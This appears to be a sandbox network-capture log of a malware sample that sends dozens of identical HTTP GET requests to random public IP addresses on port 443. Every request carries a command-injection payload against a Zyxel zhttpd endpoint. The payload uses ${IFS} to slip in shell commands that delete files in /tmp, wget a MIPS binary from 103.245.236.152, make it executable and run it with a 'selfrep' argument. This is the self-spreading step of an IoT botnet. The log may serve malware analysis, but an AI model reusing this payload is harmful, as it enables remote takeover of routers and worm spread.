                                          Jan 14, 2024 15:46:19.052941084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4894192.168.2.233714060.221.220.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053016901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4895192.168.2.235846689.90.152.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053016901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4896192.168.2.2333326105.21.11.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053049088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4897192.168.2.233422217.248.21.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053096056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4898192.168.2.234537212.58.169.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053137064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4899192.168.2.234535696.62.171.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053159952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4900192.168.2.235667434.155.20.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053196907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4901192.168.2.2336206189.38.124.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053236008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4902192.168.2.2336750175.126.98.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053273916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4903192.168.2.2340070208.13.209.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053301096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4904192.168.2.234362437.92.249.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053333998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4905192.168.2.2335212213.132.178.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053390980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4906192.168.2.233459452.197.157.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053409100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4907192.168.2.2340376140.25.18.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053456068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4908192.168.2.2349564148.53.27.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053483009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4909192.168.2.234696467.31.17.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053493977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4910192.168.2.233377099.194.88.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053556919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4911192.168.2.234876480.11.106.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053570986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4912192.168.2.2346338181.218.26.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053637028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4913192.168.2.2337922122.165.88.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053661108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4914192.168.2.2344568144.120.45.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053736925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4915192.168.2.2352838173.66.89.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053761959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4916192.168.2.2338204120.215.236.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053787947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4917192.168.2.2348692211.172.167.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053833008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4918192.168.2.2359266135.224.94.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053875923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4919192.168.2.2334380195.177.0.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053905964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4920192.168.2.235053436.148.191.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053947926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4921192.168.2.236092862.178.70.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.053994894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4922192.168.2.2356460155.48.157.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054024935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4923192.168.2.233520666.224.42.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054048061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4924192.168.2.235307220.71.78.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054127932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4925192.168.2.2349868161.250.32.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054157019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4926192.168.2.2335754168.67.96.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054169893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4927192.168.2.235348294.247.203.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054234982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4928192.168.2.233303460.70.241.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054260015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4929192.168.2.2342466151.12.2.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054297924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4930192.168.2.233289237.20.115.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054342031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4931192.168.2.235362419.219.215.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054369926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4932192.168.2.2346486163.210.140.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054399014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4933192.168.2.2344902189.52.171.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054418087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4934192.168.2.235091240.0.154.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054470062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4935192.168.2.234291073.67.119.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054508924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4936192.168.2.234616038.200.193.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054531097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4937192.168.2.2348028153.58.198.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054605007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4938192.168.2.2352320208.27.250.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054622889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4939192.168.2.233748447.242.11.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054652929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4940192.168.2.235544650.134.77.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054693937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4941192.168.2.2337694149.239.228.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054780006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4942192.168.2.2349260137.24.46.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054805040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4943192.168.2.2341030157.210.191.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054831028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4944192.168.2.23577508.140.2.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054863930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4945192.168.2.2356544130.80.101.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054892063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4946192.168.2.2360408146.227.50.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054944992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4947192.168.2.2338096120.186.244.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.054972887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4948192.168.2.233507093.242.85.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055002928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4949192.168.2.2352562122.28.10.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055058956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4950192.168.2.234171241.89.190.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055083990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4951192.168.2.23374289.181.94.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055119038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4952192.168.2.235071442.120.219.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055183887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4953192.168.2.233909237.57.49.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055214882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4954192.168.2.234502464.1.19.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055247068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4955192.168.2.2344336128.166.151.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055294991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4956192.168.2.2354708130.252.27.160443
                                          TimestampBytes transferredDirectionData
